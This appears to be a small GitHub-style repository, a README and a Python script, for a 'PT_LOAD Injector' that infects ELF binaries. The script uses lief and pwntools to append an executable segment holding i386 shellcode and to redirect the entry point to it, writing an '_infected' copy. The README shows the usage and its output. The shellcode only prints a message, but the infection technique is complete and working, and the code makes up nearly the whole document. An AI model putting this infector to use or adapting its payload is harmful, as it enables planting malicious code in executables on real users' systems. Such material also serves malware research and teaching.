├── README.md
└── main.py


/README.md:
--------------------------------------------------------------------------------
 1 | # PT_LOAD Injector
 2 | This injector was developed in Python using the lief, pwntools and argparse libraries. Therefore, these libraries must be installed on your device.
 3 | 
 4 | (Python 3.10.x)
 5 | 
 6 | ```
 7 | pip install lief
 8 | pip install pwntools
 9 | pip install argparse
10 | ```
11 | 
12 | # Usage & Output
13 | ```
14 | ➜  ~ ./test
15 | Infect Me !
16 | ➜  ~ python3 main.py -f ./test
17 | Shellcode size:  53
18 | [+] Segment added
19 | [+] Real EntryPoint:  0x8049070
20 | [+] New EntryPoint:  0x10004000
21 | ➜  ~ ls
22 | main.py  test  test.c  test_infected
23 | ➜  ~ chmod +x test_infected
24 | ➜  ~ ./test_infected
25 | this must be rhotav!
26 | Infect Me !
27 | ```
28 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | """
 2 | PT_LOAD Injection with Python and LIEF
 3 | 
 4 | Author: @rhotav
 5 | 
 6 | MALWATION
 7 | """
 8 | 
 9 | import lief
10 | from pwn import *
11 | import argparse
12 | 
13 | def main():
14 |     parser = argparse.ArgumentParser()
15 |     parser.add_argument("-f", help="Binary to infect", required = True)
16 |     parser.add_argument("-o", help="Output file")
17 |     args = parser.parse_args()
18 | 
19 |     if len(sys.argv) < 2: 
20 |         args.print_help()
21 |         exit(0)
22 | 
23 |     payload = "this must be rhotav!\n"
24 |     binary = lief.parse(args.f)
25 | 
26 |     shellcode = asm("mov esi, edx")
27 |     shellcode += asm(shellcraft.i386.write(1, payload, len(payload)))
28 |     shellcode += asm(f"""
29 |     mov edx, esi
30 |     push {hex(binary.header.entrypoint)}
31 |     ret
32 |     """)
33 | 
34 |     print("Shellcode size: ", len(shellcode))
35 | 
36 |     segment           = lief.ELF.Segment()
37 |     segment           = lief.ELF.Segment()
38 |     segment.type      = lief.ELF.SEGMENT_TYPES.LOAD
39 |     segment.flags     = lief.ELF.SEGMENT_FLAGS.X
40 |     segment.content   = bytearray(shellcode)
41 |     segment.alignment = 0x999
42 |     binary.add(segment)
43 | 
44 |     print("[+] Segment added")
45 | 
46 |     print("[+] Real EntryPoint: ", hex(binary.header.entrypoint))
47 |     
48 |     for seg in binary.segments:
49 |         if seg.type == lief.ELF.SEGMENT_TYPES.LOAD and \
50 |             seg.alignment == 0x999:
51 |             binary.header.entrypoint = seg.virtual_address
52 |             break
53 |     
54 |     print("[+] New EntryPoint: ", hex(binary.header.entrypoint))
55 |     
56 |     if args.o:
57 |         binary.write(args.o)
58 |     else:
59 |         binary.write(args.f + "_infected")
60 | 
61 | if __name__ == "__main__":
62 |     main()


--------------------------------------------------------------------------------